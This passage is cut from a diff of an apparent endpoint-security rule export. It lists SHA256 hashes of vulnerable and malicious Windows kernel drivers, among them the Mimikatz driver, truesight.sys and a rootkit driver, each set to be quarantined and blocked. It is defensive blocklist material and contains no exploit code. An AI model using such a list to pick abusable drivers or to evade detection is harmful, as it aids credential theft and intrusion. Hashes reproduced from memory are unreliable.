true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145807Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c06f28debb4b70eda58fcc200135f50d3dc4fbc7dd0d9f71180cd81fdcc871f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d38ae6d-4d9f-5ed6-ad9f-6132bb960f2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468583Z", + "creation_date": "2026-03-23T11:45:30.468586Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468595Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "058c84860fb9fefd4c5cec57b6ef9f43146a6509b6894f2a27fb5a2dd16d578b", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d4a8c8f-d2ab-5a1d-8b79-38f79dbee7a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150409Z", + "creation_date": "2026-03-23T11:45:31.150411Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150416Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "535a9cfd2cd3809db4ed92b8e64769ca9bf10aa9cd75e9e4ae500188706813cb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d4cd469-62d1-58f3-96dd-1355ef03bc42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822362Z", + "creation_date": "2026-03-23T11:45:31.822363Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822369Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "52ea7d44f5d0945b92a34c705495fa8f8aa9b2f45f2b22598d1e7f5e3f524376", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d4d7869-dab0-5a46-907b-986e430a6bad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984174Z", + "creation_date": "2026-03-23T11:45:29.984176Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984181Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db68a9cbe22b22cba782592eef76e63e080ee8d30943be6da694701f44b6c33e", + "comment": "Vulnerable Kernel Driver (aka OpenLibSys.sys) [https://www.loldrivers.io/drivers/2e4fedb0-30ed-400d-b4e1-b2b2004c1607/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d502764-a8b3-5628-b5cf-5bde97eb0555", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470011Z", + "creation_date": "2026-03-23T11:45:30.470014Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470023Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3de9802a0a1f2da67908a69b4face53b2e62d8106d7c8e2f1d4acfd0a0694f26", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d51173b-5a18-53b4-a479-393f09876f42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969699Z", + "creation_date": "2026-03-23T11:45:29.969701Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "128bf3838267c86c8163f82f087e564814228288702e08b31ec26dc7525159ac", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] 
[https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d5531b0-f5dc-5d00-8186-017b93bd5d38", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479133Z", + "creation_date": "2026-03-23T11:45:30.479137Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479147Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038", + "comment": "Vulnerable Kernel Driver (aka rtkiow8x64.sys ) [https://www.loldrivers.io/drivers/998ed67c-9c20-46ef-a6ba-abc606b540b9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d66d5c6-326e-50b6-a324-0173c22195d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481345Z", + "creation_date": "2026-03-23T11:45:30.481349Z", + "enabled": true, + "block_on_agent": 
true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481364Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e26a21e1b79ecaee7033e05edb0bd72aca463c23bd6fdf5835916ce2dfdf1a63", + "comment": "Vulnerable Kernel Driver (aka phymem_ext64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d74c0fa-f4c0-5dbc-9d5b-be832bbccafb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825906Z", + "creation_date": "2026-03-23T11:45:31.825908Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825914Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e54dd3504b5793374e6a86f6e3bca9cc65adc933966650228bc85aadb4f62db3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d76d0e1-a4a7-57c8-979f-3e67cbe165ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610811Z", + "creation_date": "2026-03-23T11:45:29.610813Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610818Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "deecbcd260849178de421d8e2f177dce5c63cf67a48abb23a0e3cf3aa3e00578", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d7d47dc-f469-5ba6-ba98-14f33c00f5c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150858Z", + "creation_date": "2026-03-23T11:45:31.150860Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150865Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "068b16fe0621a588c76f8c3f5d8c60a5508e59deef745823a8678c8f2eace2f5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d81f1a6-0b49-5857-873c-7ea236c7621b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833234Z", + "creation_date": "2026-03-23T11:45:30.833238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833246Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a131c92a1a03f5b8270c022d3a037e27e3ac8e94fef4f03c35b533f2115e7b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2d8ab166-a8df-59f7-ade7-71173e028b12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809135Z", + "creation_date": "2026-03-23T11:45:31.809137Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809143Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5928478c14a1f50542a9c2e5dbdc6a8419e6c8ae79e3aad1209957cdb53bc136", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2da6c0d3-0eca-5574-89b5-5acf10b6c3b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814363Z", + "creation_date": "2026-03-23T11:45:31.814366Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814374Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31e47907cb77b4f47b90b1f1d83708970ba9c75003605217e2c5cdadaf01ad9e", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2daf1f42-7c01-54f7-b8e1-ae81755d50c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819756Z", + "creation_date": "2026-03-23T11:45:31.819759Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819768Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b3e4c6da318fd5a2a0942d19af1acfad48a0bec8a110f9d32c28513841e3f9f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2db32db6-e021-5ff9-be08-f8294763e1e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, 
+ "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970582Z", + "creation_date": "2026-03-23T11:45:29.970584Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970590Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ecee4ac0ca126487abd39bd461e160118a33f68466128d695ecfde7eca0c340f", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2dc7ad67-af79-5a5c-84d9-fa2dc9bc7982", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489965Z", + "creation_date": "2026-03-23T11:45:31.489968Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489977Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a23f56d5fc0fc9bcaabd5943d042241ceac855257f87e4439637bbd769364954", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2dcb60df-aa07-5992-85de-4fd619d494f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614543Z", + "creation_date": "2026-03-23T11:45:29.614545Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614550Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2dce5400-3603-5c20-8638-31d53de3e450", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488552Z", + "creation_date": "2026-03-23T11:45:31.488554Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488559Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8cdce30ffc719e709b8de1d4146b700d71994e58cccba28e9a24b657708d5cd2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2dcf9b0d-1640-5cd8-ba9a-ced1bfb15ec8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.147168Z", + "creation_date": "2026-03-23T11:45:32.147170Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.147176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e44657710d6e525f6807eb32ae74ba8fa4578574e60bd82774bf4b735adf70eb", + "comment": "Malicious Kernel Driver (aka AppvVStram_.sys) [https://securelist.com/honeymyte-kernel-mode-rootkit/118590/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2df56d32-b564-5249-ac26-77f766ee0afc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145290Z", + "creation_date": "2026-03-23T11:45:31.145292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145297Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62536485cdd116a9be1d739fc0136e62d33a4d95eda68727166b717f2560ff2a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2e1803f1-74a8-5c29-952d-3a079b2969ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819158Z", + "creation_date": "2026-03-23T11:45:30.819160Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819165Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "36d8d27d2ee91c45502d3a6688afc5c09b2b9776232074e65bd813a230eb37d1", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2e1859bd-abce-5486-bb40-de526449a23c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490297Z", + "creation_date": "2026-03-23T11:45:31.490299Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490305Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "701e9df3097b53de461ba7a61e5499443e57a0cfe6ead7cd4ebbd1867a8c71e4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2e22a42c-517a-5762-9d86-6b014106f512", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620295Z", + "creation_date": "2026-03-23T11:45:29.620297Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620303Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2e24b4f7-c09a-52c8-b698-653c0f2547f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 